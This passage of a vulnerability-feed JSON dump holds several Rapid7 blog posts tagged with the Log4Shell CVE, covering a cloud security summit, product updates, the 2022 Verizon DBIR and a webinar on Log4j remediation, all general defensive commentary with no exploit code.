examples inspire you to action. 
If you'd like to stay in the holiday spirit, check out the rest of our [Hacky Holidays](<https://www.rapid7.com/blog/tag/hacky-holidays-2021/>) specials.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-04T18:44:58", "type": "rapid7blog", "title": "5 Security Projects That Are Giving Back", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-04T18:44:58", "id": "RAPID7BLOG:E3D08ECAA9A93569D5544F4D6AAEEB74", "href": "https://blog.rapid7.com/2022/01/04/5-security-projects-that-are-giving-back/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-09T17:28:27", "description": "\n\nThe world of the cloud never stops moving \u2014 so neither can cloud security. 
In the face of rapidly evolving technology and a constantly changing threat landscape, keeping up with all the latest developments, trends, and best practices in this emerging practice is more vital than ever.\n\nEnter Rapid7\u2019s [third annual Cloud Security Summit](<https://www.rapid7.com/info/events-2022/rapid7-cloud-security-summit/>), which we\u2019ll be hosting this year on Tuesday, March 29. This one-day virtual event is dedicated to [cloud security best practices](<https://www.rapid7.com/fundamentals/cloud-network-security/>) and will feature industry experts from Rapid7, as well as Amazon Web Services (AWS), Snyk, and more. \n\nWhile the event is fully virtual and free, we know that the time commitment can be the most challenging part of attending a multi-hour event during the workday. With that in mind, we\u2019ve compiled a short list of the top reasons you\u2019ll definitely want to register, clear your calendar, and attend this event.\n\n## Reason 1: Get a sneak peek at some original cloud security research\n\nDuring the opening session of this year\u2019s summit, two members of Rapid7\u2019s award-winning security research team will be presenting some never-before-published research on the current state of cloud security operations, the [most common misconfigurations in 2021](<https://www.rapid7.com/info/2021-cloud-misconfigurations-research-report/>), [Log4j](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>), and more.\n\nAlong with being genuinely interesting data, this research will also give you some insights and benchmarks that will help you evaluate your own [cloud security program](<https://www.rapid7.com/fundamentals/cloud-security/>), and prioritize the most commonly exploited risks in your organization's environment.\n\n## Reason 2: Learn from industry experts, and get CPE credits\n\nAlong with a handful of team members from Rapid7\u2019s own cloud security practice, this year\u2019s summit includes a host of subject matter 
experts from across the industry. You can look forward to hearing from Merritt Baer, Principal in the Office of the CISO at Amazon Web Services; Anthony Seto, Field Director for Cloud Native Application Security at Snyk; Keith Hoodlet, Code Security Architect at GitHub; and more. And that doesn\u2019t even include the InsightCloudSec customers who will be joining to share their expert perspectives as well.\n\nWhile learning and knowledge gain are clearly the most important aspects here, it\u2019s always great to have something extra to show for the time you devoted to an event like this. To help make the case to your management that this event is more than worth the time you\u2019ll put in, we\u2019ve arranged for all attendees to earn 3.5 continuing professional education (CPE) credits to go toward maintaining or upgrading security certifications, such as [CISSP](<https://www.isc2.org/Certifications/CISSP#>), [CISM](<https://www.isaca.org/credentialing/cism/maintain-cism-certification>), and more. \n\n## Reason 3: Be the first to hear exciting Rapid7 announcements\n\nLast but not least, while the event is primarily focused on cloud security research, strategies, and thought leadership, we are also planning to pepper in some exciting news related to [InsightCloudSec](<https://www.rapid7.com/products/insightcloudsec/>), Rapid7\u2019s cloud-native security platform. \n\nWe\u2019ll end the day with a demonstration of the product, so you can see some of our newest capabilities in action. Whether you're already an InsightCloudSec customer, or considering a new solution for uncovering misconfigurations, automating cloud security workflows, shifting left, and more, this is the best way to get a live look at one of the top solutions available in the market today. \n\nSo what are you waiting for? 
Come join us, and let\u2019s dive into the latest and greatest in cloud security together.\n\n#### Join our 2022 Cloud Security Summit\n\n[Register Now](<https://www.rapid7.com/info/events-2022/rapid7-cloud-security-summit/>)\n\n**_Additional reading_**\n\n * _[Cloud Security and Compliance: The Ultimate Frenemies of Financial Services](<https://www.rapid7.com/blog/post/2022/02/17/cloud-security-and-compliance-the-ultimate-frenemies-of-financial-services/>)_\n * _[Stay Ahead of Threats With Cloud Workload Protection](<https://www.rapid7.com/blog/post/2021/12/10/stay-ahead-of-threats-with-cloud-workload-protection/>)_\n * _[InsightCloudSec Supports 12 New AWS Services Announced at re:Invent](<https://www.rapid7.com/blog/post/2021/12/06/insightcloudsec-supports-12-new-aws-services-announced-at-re-invent/>)_\n * _[Kubernetes Guardrails: Bringing DevOps and Security Together on Cloud](<https://www.rapid7.com/blog/post/2021/12/06/kubernetes-guardrails-bringing-devops-and-security-together-on-cloud/>)_", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-09T17:06:13", "type": "rapid7blog", "title": "3 Reasons to Join Rapid7\u2019s Cloud Security Summit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-09T17:06:13", "id": "RAPID7BLOG:45B045D2EE21432DF9939E4402522BFC", "href": "https://blog.rapid7.com/2022/03/09/3-reasons-to-join-rapid7s-cloud-security-summit/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-19T19:35:50", "description": "\n\nThe world of cybersecurity never has a dull moment. While we are still recovering from the aftermath of [Log4Shell](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>), the recent [ContiLeaks](<https://www.rapid7.com/blog/post/2022/03/01/conti-ransomware-group-internal-chats-leaked-over-russia-ukraine-conflict/>) exposed multiple vulnerabilities that have been exploited by the Conti ransomware group. It\u2019s critical for your team to identify the risk posed by such vulnerabilities and implement necessary remediation measures. As you will see, the product updates our vulnerability management (VM) team has made to [InsightVM](<https://www.rapid7.com/products/insightvm/>) and [Nexpose](<https://www.rapid7.com/products/nexpose/>) in the last quarter will empower _you_ to stay in charge \u2014 not the vulnerabilities.\n\nBut that\u2019s not all we\u2019ve improved on. We\u2019ve increased the scope of vulnerabilities tracked by incorporating [CISA\u2019s known exploited vulnerabilities (KEV)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) in the Threat Feed, usability enhancements, targeted reporting and scanning, and Log4Shell mitigation checks. And we\u2019ve released our annual [Vulnerability Intelligence Report](<https://www.rapid7.com/products/insightvm/vulnerability-report-hub-page/>) to help you make sense of the vulns that impacted us last year and understand the trends that we will all be facing this year. 
Our team also offers practical guidance to help security teams better protect themselves.\n\nLet\u2019s dive into the key feature releases and updates on the vulnerability management front for Q1 2022.\n\n## [InsightVM] ContiLeaks Helpful Query to easily detect ContiLeaks vulns and ensure compliance\n\nCISA\u2019s KEV catalog is part of the agency\u2019s [binding operational directive](<https://www.cisa.gov/binding-operational-directive-22-01>) that has reporting requirements for federal agencies and civilian contractors. The recent ContiLeaks revealed over 30 vulns that are now a part of CISA\u2019s KEV. While users could always build a query in IVM to identify these vulns, doing so is time-consuming and can be prone to error. The ContiLeaks Helpful Query takes out the manual effort and lets customers easily locate 30+ ContiLeaks vulnerabilities in their environments. When the query is loaded into our Specific Vulnerability Dashboard template, it can give an at-a-glance view of the company\u2019s risk posture as it relates to the Conti threat. In addition to helping customers identify the exploited vulnerabilities in their environment, the update will also help them stay within the bounds of CISA\u2019s operational directive.\n\n## [InsightVM] Threat feed dashboard now includes CISA\u2019s KEV catalog\n\nWhile we are on the topic of CISA, you will be excited to learn that we have expanded the scope of vulnerabilities tracked to incorporate CISA\u2019s KEV catalog in the InsightVM [Threat Feed Dashboard](<https://www.rapid7.com/blog/post/2017/06/13/live-threat-driven-prioritization/>), including the **Assets With Actively Targeted Vulnerabilities** card and the **Most Common Actively Targeted Vulnerabilities** card. The CISA inclusion makes it easy to see how exposed your organization is to active threats and inform prioritization decisions around remediation efforts. 
\n\nWe have also added a new \u201cCISA KEV (known exploited vulnerability)\u201d vulnerability category to allow for more targeted scanning (i.e. scanning the environment for CISA KEV entries only). You can also use the CISA KEV category to filter scan reports.\n\n## [Insight VM and Nexpose] A new credential type to support scanning Oracle Databases by Service Name\n\nInsightVM and Nexpose customers have always been able to scan Oracle databases using SIDs (system identifiers) but were previously unable to provide a Service Name in the credential. This meant a gap in visibility for Oracle databases that could only be accessed via their Service Name. We were not happy with this limitation. Now you can configure Oracle Database scans to specify a Service Name instead of an SID (you can still use the SID if you want) when authenticating. You now have visibility into a wider range of Oracle Database deployment configurations and the ability to configure scans using either a Service Name or an SID.\n\n## [Insight VM and Nexpose] Automatic Scan Assistant credentials generation\n\nLast year, [we introduced Scan Assistant](<https://www.rapid7.com/blog/post/2022/02/18/whats-new-in-insightvm-and-nexpose-q4-2021-in-review/>), which alleviates the credential management (for Scan Engine) burden on vulnerability management teams. For the Scan Assistant to communicate with the Scan Engine, it requires digital certificates to be manually created and deployed on both the target assets and the Nexpose / IVM Security Console. Manually creating the public / private key pair is a complex and error-prone process. \n\nWith this update, we are taking some more burden off the vulnerability management teams. You can now use the Shared Credentials management UI to automatically generate Scan Assistant credentials. 
This not only reduces the technical expertise and time required to manage Scan Assistant credentials but also makes for a user-friendly experience for you.\n\nLearn more in our recent blog post on [passwordless scanning](<https://www.rapid7.com/blog/post/2021/10/18/passwordless-network-scanning-same-insights-less-risk/>).\n\n## [Insight VM and Nexpose] Log4Shell mitigation checks\n\nThe product improvements list would be incomplete without an update on Log4Shell.\n\nIf you are vulnerable to Log4Shell, you can edit the JAR files on a system to take out the vulnerable code and thus not get exploited. However, verifying this manually across an environment is difficult. This update adds the capability to not only check the version of Log4j present in your environment but also whether it has been mitigated \u2014 i.e., whether the vulnerable code has been removed.\n\nAuthenticated scans and Agent-based assessments can now determine whether the JNDILookup class removal mitigation for Log4Shell has been applied to Log4j JAR files on Windows systems. This will reduce the number of reports of the vulnerability on systems that are not exploitable. We also added an Obsolete Software vulnerability check for Log4j 1.x, which will let you find obsolete versions of Log4j in your environment.\n\n## Stay in charge\n\nAs always, we hope these updates will make it easier for you to stay ahead of vulnerabilities. \n\nIt almost felt like the quarter might end on a calm note, but then the world of cybersecurity never has a dull moment. The end of the quarter saw Spring4Shell, another zero-day vulnerability in the Spring Core module of Spring Framework. 
[Learn more about Rapid7's response to this vulnerability](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>) and how we are working around the clock to help our customers protect their own environments from Spring4Shell.\n\n_**Additional reading:**_\n\n * _[InsightVM Release Notes](<https://docs.rapid7.com/release-notes/insightvm/>)_\n * _[Widespread Exploitation of Critical Remote Code Execution in Apache Log4j](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>)_\n * _[The Rapid7 Annual Vulnerability Intelligence Report Webcast](<https://information.rapid7.com/2021_Vuln_Intelligence_Report_WC.html>)_", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-19T17:52:17", "type": "rapid7blog", "title": "What's New in InsightVM and Nexpose: Q1 2022 in Review", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-19T17:52:17", "id": 
"RAPID7BLOG:ED80467D2D29D8DC10E754C9EA19D9AD", "href": "https://blog.rapid7.com/2022/04/19/whats-new-in-insightvm-and-nexpose-q1-2022-in-review/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-31T13:56:09", "description": "\n\nSometimes, data surprises you. When it does, it can force you to rethink your assumptions and second-guess the way you look at the world. But other times, data can reaffirm your assumptions, giving you hard proof they're the right ones \u2014 and providing increased motivation to act decisively based on that outlook.\n\nThe 2022 edition of [Verizon's Data Breach Investigations Report (DBIR)](<https://www.verizon.com/business/en-gb/resources/reports/dbir/>), which looks at data from cybersecurity incidents that occurred in 2021, is a perfect example of this latter scenario. This year's DBIR rings many of the same bells that have been resounding in the ears of security pros worldwide for the past 12 to 18 months \u2014 particularly, the threat of [ransomware](<https://www.rapid7.com/solutions/ransomware/>) and the increasing relevance of complex supply chain attacks.\n\nHere are our three big takeaways from the 2022 DBIR, and why we think they should have defenders doubling down on the big cybersecurity priorities of the current moment.\n\n## 1\\. Ransomware's rise is reaffirmed\n\nIn 2021, it was hard to find a cybersecurity headline that didn't somehow pertain to ransomware. 
It impacted some [80% of businesses last year](<https://thejournal.com/articles/2022/04/27/ransomware-hit-over-half-of-k12-organizations-worldwide-in-2021-sophos-survey-finds.aspx>) and threatened some of the institutions most critical to our society, from [primary and secondary schools](<https://thejournal.com/articles/2022/04/27/ransomware-hit-over-half-of-k12-organizations-worldwide-in-2021-sophos-survey-finds.aspx>) to [hospitals](<https://www.pewtrusts.org/en/research-and-analysis/blogs/stateline/2022/05/18/ransomware-attacks-on-hospitals-put-patients-at-risk>).\n\nThis year's DBIR confirms that ransomware is the critical threat that security pros and laypeople alike believe it to be. Ransomware-related breaches increased by 13% in 2021, the study found \u2014 that's a greater increase than we saw in the past 5 years _combined_. In fact, nearly 50% of all system intrusion incidents \u2014 i.e., those involving a series of steps by which attackers infiltrate a company's network or other systems \u2014 involved ransomware last year.\n\nWhile the threat has massively increased, the top methods of ransomware delivery remain the ones we're all familiar with: desktop sharing software, which accounted for 40% of incidents, and email at 35%, according to Verizon's data. The growing ransomware threat may seem overwhelming, but the most important steps organizations can take to prevent these attacks remain the fundamentals: educating end users on how to spot phishing attempts and maintain security best practices, and equipping infosec teams with the tools needed to detect and respond to suspicious activity.\n\n## 2\\. Attackers are eyeing the supply chain\n\nIn 2021 and 2022, we've been using the term \"supply chain\" more than we ever thought we would. 
COVID-induced disruptions in the flow of commodities and goods caused [lumber to skyrocket](<https://bdmag.com/lumber-price-volatility-supply-chain/>) and [automakers to run short on microchips](<https://www.consumerreports.org/buying-a-car/global-chip-shortage-makes-it-tough-to-buy-certain-cars-a8160576456/>).\n\nBut security pros have had a slightly different sense of the term on their minds: the software supply chain. Breaches from [Kaseya](<https://www.rapid7.com/blog/post/2021/07/13/managed-service-providers-used-in-coordinated-mass-ransomware-attack-impacting-hundreds-of-companies/>) to [SolarWinds](<https://www.rapid7.com/blog/post/2021/01/12/update-on-solarwinds-supply-chain-attack-sunspot-and-new-malware-family-associations/>) \u2014 not to mention the [Log4j vulnerability](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>) \u2014 reminded us all that vendors' systems are just as likely a vector of attack as our own.\n\nUnfortunately, Verizon's Data Breach Investigations Report indicates these incidents are not isolated events \u2014 the software supply chain is, in fact, a major avenue of exploitation by attackers. In fact, 62% of cyberattacks that follow the system intrusion pattern began with the threat actors exploiting vulnerabilities in a partner's systems, the study found.\n\nPut another way: If you were targeted with a system intrusion attack last year, it was almost twice as likely that it began on a partner's network than on your own.\n\nWhile supply chain attacks still account for just under 10% of overall cybersecurity incidents, according to the Verizon data, the study authors point out that this vector continues to account for a considerable slice of all incidents each year. That means it's critical for companies to keep an eye on both their own and their vendors' security posture. 
This could include:\n\n * Demanding visibility into the components behind software vendors' applications\n * Staying consistent with regular patching updates\n * Acting quickly to remediate and emergency-patch when the next major vulnerability that could affect high numbers of web applications rears its head\n\n## 3\\. Mind the app\n\nBetween [Log4Shell](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>) and [Spring4Shell](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>), the past 6 months have jolted developers and security pros alike to the realization that their web apps might contain vulnerable code. This proliferation of new avenues of exploitation is particularly concerning given just how commonly attackers target web apps.\n\nCompromising a web application was far and away the top cyberattack vector in 2021, accounting for roughly 70% of security incidents, according to Verizon's latest DBIR. Meanwhile, web servers themselves were the most commonly exploited asset type \u2014 they were involved in nearly 60% of documented breaches.\n\nMore than 80% of attacks targeting web apps involved the use of stolen credentials, emphasizing the importance of user awareness and strong authentication protocols at the endpoint level. 
That said, 30% of basic web application attacks did involve some form of exploited vulnerability \u2014 a percentage that should be cause for concern.\n\n\"While this 30% may not seem like an extremely high number, the targeting of mail servers using exploits has increased dramatically since last year, when it accounted for only 3% of the breaches,\" the authors of the Verizon DBIR wrote.\n\nThat means vulnerability exploits accounted for a 10 times greater proportion of web application attacks in 2021 than they did in 2022, reinforcing the importance of being able to quickly and efficiently test your applications for the [most common types of vulnerabilities](<https://www.rapid7.com/blog/post/2021/09/30/the-2021-owasp-top-10-have-evolved-heres-what-you-should-know/>) that hackers take advantage of.\n\n## Stay the course\n\nFor those who've been tuned into the current cybersecurity landscape, the key themes of the 2022 Verizon DBIR will likely feel familiar \u2014 and with so many major breaches and vulnerabilities that claimed the industry's attention in 2021, it would be surprising if there were any major curveballs we missed. But the key takeaways from the DBIR remain as critical as ever: Ransomware is a top-priority threat, software supply chains need greater security controls, and web applications remain a key attack vector.\n\nIf your go-forward cybersecurity plan reflects these trends, that means you're on the right track. 
Now is the time to stick to that plan and ensure you have tools and tactics in place that let you focus on the alerts and vulnerabilities that matter most.\n\n_**Additional reading:**_\n\n * _[A Year on from the Ransomware Task Force Report](<https://www.rapid7.com/blog/post/2022/05/24/a-year-on-from-the-ransomware-task-force-report/>)_\n * _[Are You in the 2.5% Who Meet This Cybersecurity Job Requirement?](<https://www.rapid7.com/blog/post/2022/05/20/are-you-in-the-2-5-who-meet-this-cybersecurity-job-requirement/>)_\n * _[What's Changed for Cybersecurity in Banking and Finance: New Study](<https://www.rapid7.com/blog/post/2022/05/10/whats-changed-for-cybersecurity-in-banking-and-finance-new-study/>)_\n * _[How to Strategically Scale Vendor Management and Supply Chain Security](<https://www.rapid7.com/blog/post/2022/04/26/how-to-strategically-scale-vendor-management-and-supply-chain-security/>)_", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-31T13:22:17", "type": "rapid7blog", "title": "3 Takeaways From the 2022 Verizon Data Breach Investigations Report", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": 
"NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-05-31T13:22:17", "id": "RAPID7BLOG:97E3CA7ED938F3DF6E967C832F314FA3", "href": "https://blog.rapid7.com/2022/05/31/3-takeaways-from-the-2022-verizon-data-breach-investigations-report/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-17T20:18:00", "description": "\n\n[CVE-2021-44228](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>) rules everything around us \u2014 or so it seemed, at least, for those breathless days in December 2021 when the full scope of [Log4Shell](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>) was starting to take hold and security teams were strapped for time and resources as they scoured their organizations' environments for vulnerable instances of Apache Log4j. But now that the peak intensity around this vulnerability has waned and we've had a chance to catch our collective breath, where does the effort to patch and remediate stand? What should security teams be focusing on today in the fight against Log4Shell?\n\nOn Wednesday, February 16, Rapid7 experts Bob Rudis, Devin Krugly, and Glenn Thorpe sat down for a webinar on the current state of the Log4j vulnerability. They covered where Log4Shell stands now, what the future might hold, and what organizations should be doing proactively to ensure they're as protected as possible against exploits.\n\n## Laying out the landscape\n\nGlenn Thorpe, Rapid7's Program Manager for Emergent Threat Response, kicked things off with a recap and retrospective of Log4Shell and why it seemingly set fire to the entire internet for a good portion of December. 
The seriousness of this vulnerability is due to the coming-together of several key factors, including:\n\n * The ability for vulnerable systems to grant an attacker full administrative access\n * The low level of skill required for exploitation \u2014 in many cases, attackers simply have to copy and paste\n * The attack vector's capability to run undetected over an encrypted channel\n * The pervasiveness of the Log4j library, which means vulnerability scanners alone can't act as complete solutions against this threat\n\nPut all this together, and it's no surprise that the volume of exploit attempts leveraging the Log4j vulnerability ramped up throughout December 2021 and has continued to spike periodically throughout January and February 2022. By January 10, ransomware using Log4Shell had been observed, and on January 14, Rapid7's MDR saw [mass Log4j exploits in VMware products](<https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/>).\n\nBut while there's certainly been plenty of Log4j patching done, the picture on that front is far from complete. According to the [latest CISA data](<https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md>) (also [here](<https://docs.google.com/spreadsheets/d/1jidw2hK4zeIwjR5kdzqRzYT04GWP6LSTGLoXvSRSENE/edit#gid=0>) as a daily-updated spreadsheet), there are still 320 cataloged software products that are known to be affected by vulnerable Log4j as of February 16, 2022 \u2014 and 1,406 still awaiting confirmation from the vendor.\n\n## Log4j today: A new normal?\n\nSo, where does the effort to put out Log4j fires stand now? Devin Krugly, Rapid7's Practice Advisor for Vulnerability Risk Management, thinks we're in a better spot than we were in December \u2014 but we're by no means out of the woods.\n\n\"We're effectively out of fire-fighting mode,\" said Devin. 
That means that, at this point, most security teams have identified the affected systems, implemented mitigations, and patched vulnerable versions of Log4j. But because of the complexity of today's software supply chains, there are often heavily nested dependencies within vendor systems \u2014 some of which Log4j may still be implicated in. This means it's essential to have a solid inventory of vendor software products that may be using Log4j and to ensure those instances of the library are updated and patched.\n\n\"Don't lose that momentum,\" Glenn chimed in. \"Don't put that on your post-mortem action list and forget about it.\"\n\nThis imperative is all the more critical because of a recent uptick in Log4Shell activity. Rapid7's Chief Data Scientist Bob Rudis laid out some [activity detected by the Project Heisenberg honeypot fleet](<https://www.rapid7.com/research/project-doppler/>) indicating a revival of Log4j activity in early and mid-February, much of it from new infrastructure and scanning hosts that hadn't been seen before.\n\nAmid this increase in activity, vulnerable instances of Log4j are anything but gone from the internet. In fact, data from [Sonatype](<https://www.sonatype.com/resources/log4j-vulnerability-resource-center>) as of February 16, 2022 indicates 39% of Log4j downloads are _still_ versions vulnerable to Log4Shell.\n\n\"We're going to be seeing Log4j attempts on the internet, on the regular, at a low level, forever,\" Bob said. Log4Shell is now in a family with WannaCry and Conficker (yes, that Conficker) \u2014 vulnerabilities that are around indefinitely, and which we'll need to continually monitor for as attackers use them to try to breach our defenses.\n\n## Navigating life with Log4Shell\n\nAdopting a defense-in-depth posture in the \"new normal\" of life with Log4Shell is sure to come with its share of headaches. 
Luckily, Bob, Devin, and Glenn shared some practical strategies that security teams can adopt to keep their organizations' defenses strong and avoid some common pitfalls.\n\n### Go beyond compensating controls\n\n\"My vendor says they've removed the JNDI class from the JAR file \u2014 does that mean their application is no longer vulnerable to Log4Shell?\" This question came up in a few different forms from our webinar audience. The answer from our panelists was nuanced but crystal-clear: maybe for now, but not forever.\n\nRemoving the JNDI class is a compensating control \u2014 one that provides a quick fix for the vulnerability but doesn't patch the core, underlying problem via a full update. For example, when you do a backup, you might unknowingly reintroduce the JNDI class after removing it \u2014 or, as Devin pointed out, an attacker could chain together a replacement for it.\n\nThese kinds of compensating or mitigating controls have their place in a short-term response, but there's simply no action that can replace the work of upgrading all instances of Log4j to the most up-to-date versions that contain patches for Log4Shell.\n\n\"Mitigate for speed, but not in perpetuity,\" Glenn recommended.\n\n### Find the nooks and crannies\n\nToday's cloud-centric IT environments are increasingly ephemeral and on-demand \u2014 a boost for innovation and speed, but that also means teams can deploy workloads without security teams ever knowing about it. Adopting an \"Always Be Scanning\" mindset, as Bob put it, is essential to ensure vulnerable instances of Log4j aren't introduced into your environment.\n\nContinually scanning your internet-facing components is a good and necessary start \u2014 but the work doesn't end there. As Devin pointed out, finding the nooks and crannies where Log4j might crop up is critical. This includes scouring containers and virtual machines, as well as analyzing application and server logs for malicious JNDI strings. 
You should also ensure your [security operations center (SOC)](<https://www.rapid7.com/fundamentals/security-operations-center/>) team can quickly and easily identify indicators that your environment is being scanned for reconnaissance into Log4Shell exploit opportunities.\n\n\u201cInvolving the SOC team for alerting purposes, if you haven't already done that, is an absolutely necessity in this case,\" said Devin.\n\n### Get better at vendor management\n\nIt should be clear by now that in a post-Log4j world, organizations must demand the highest possible level of visibility into their software supply chain \u2014 and that means being clear, even tough, with vendors.\n\n\u201cManaging stuff on the internet is hard because organizations are chaotic beings by nature, and you're trying to control the chaos as a security professional,\" said Bob. Setting yourself up success in this context means having the highest level of vulnerability possible. After all, how many other vulnerabilities just as bad as Log4Shell \u2014 or even worse \u2014 might be out there lurking in the corners of your vendors' code?\n\nThe upcoming US government requirements around [Software Bill of Materials (SBOM)](<https://www.federalregister.gov/documents/2021/06/02/2021-11592/software-bill-of-materials-elements-and-considerations>) for vendor procurement should go a long way toward raising expectations for software vendors. Start asking vendors if they can produce an SBOM that details remediation and update of any vulnerable instances of Log4j.\n\nThese conversations don't need to be adversarial \u2014 in fact, vendors can be a key resource in the effort to defend against Log4Shell. 
Especially for smaller organizations or under-resourced security teams, relying on capable third parties can be a smart way to bolster your defenses.\n\n## Only you can secure the software supply chain\n\nOK, maybe that subhead is not literally true \u2014 a secure software supply chain is a community-wide effort, to which we must all hold each other accountable. The cloud-based digital ecosystem we all inhabit, whether we like it or not, is fundamentally interconnected. A pervasive vulnerability like Log4Shell is an unmistakable reminder of that fact.\n\nIt also serves as an opportunity to raise our expectations of ourselves, our organizations, and our partners \u2014 and those choices do start at home, with each security team as they update their applications, continually scan their environments, and demand visibility from their vendors. Those actions really do help create a more secure internet for everyone.\n\nSo while we'll be living with Log4Shell probably forever, it'll be living with us, too. And as scared as you are of the spider, it's even more scared of your boot.\n\n_Want to go more in-depth? Check out the full replay of our webinar, \"[Log4Shell Two Months Later: Lessons and Insights for Protectors](<https://information.rapid7.com/Log4Shell-Two-Months-Later.html>).\"_\n\n**Quick resources:**\n\nBob, Devin, and Glenn mentioned a wealth of handy links in their discussion. 
Here are those resources for quick, easy reference.

 * [CISA's Log4j Affected Database spreadsheet](<https://docs.google.com/spreadsheets/u/1/d/1jidw2hK4zeIwjR5kdzqRzYT04GWP6LSTGLoXvSRSENE/edit?usp=drive_web&ouid=112199732671088168182>)
 * [CISA's Log4j Affected Database table](<https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md>)
 * [CISA Known Exploited Vulnerabilities (KEV) catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)
 * [Project Doppler](<https://www.rapid7.com/research/project-doppler/>)
 * [ShadowServer](<https://www.shadowserver.org/>)
 * [SBOM information from the US government](<https://www.federalregister.gov/documents/2021/06/02/2021-11592/software-bill-of-materials-elements-and-considerations>)

_**Additional reading:**_

